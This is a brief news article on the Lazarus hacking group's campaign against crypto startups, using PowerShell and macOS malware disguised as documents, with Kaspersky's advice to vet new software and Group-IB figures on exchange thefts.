It has been one of the most notorious cybercrime groups in the world for a number of years. Known as Lazarus, the group is believed to be from North Korea, with reports suggesting it’s sponsored by the country’s government. It has been behind some of the biggest heists, including the attack on Sony Entertainment, Lockheed Martin and the Bangladeshi central bank heist.
In recent times, its principal focus is the thriving field of crypto startups.
According to a report by Kaspersky Labs, the group has been evolving its tactics to avoid detection. Since November last year, Lazarus has had a new operation in which it takes over its victims’ computers. It uses PowerShell for Windows users, and customized macOS malware for Apple users.
The PowerShell scripts communicate with malicious C2 servers, executing commands from the operator. The malware can download and upload files, show and update malware configuration and collect basic information from the host.
Lazarus acquires the servers by either buying new ones or hacking already existing servers. Whenever they hack servers, it’s much harder to detect the attack as the server looks legitimate. The servers are located on different continents, with Asia and Europe having the most.
Since they target crypto startups, they design the malware as documents that are likely to interest crypto professionals. The group also designs malware in different formats to avoid detection. In recent months, the group has focused on Apple products. This is because there’s a tendency for startups that are doing well to prefer Apple products.
The report urged crypto startups to exercise extra caution in the wake of the attacks:
“If you’re part of the booming cryptocurrency or technological startup industry, exercise extra caution when dealing with new third parties or installing software on your systems. It’s best to check new software with an antivirus or at least use popular free virus-scanning services such as VirusTotal.”
Lazarus has been one of the biggest hacking groups in the crypto industry. According to a report by The Next Web last year, Lazarus was responsible for 65 percent of all the crypto exchange hacks.
The report, compiled by cybersecurity firm Group-IB, revealed that Lazarus had stolen $571 million of the $882 stolen in 2018. The bulk of their money came from the hack of the Coincheck crypto exchange, the biggest heist in crypto to date. The group stole $534 million in NEM tokens.
New to Bitcoin? Check out CoinGeek’s Bitcoin for Beginners section, the ultimate resource guide to learn more about Bitcoin—as originally envisioned by Satoshi Nakamoto—and blockchain.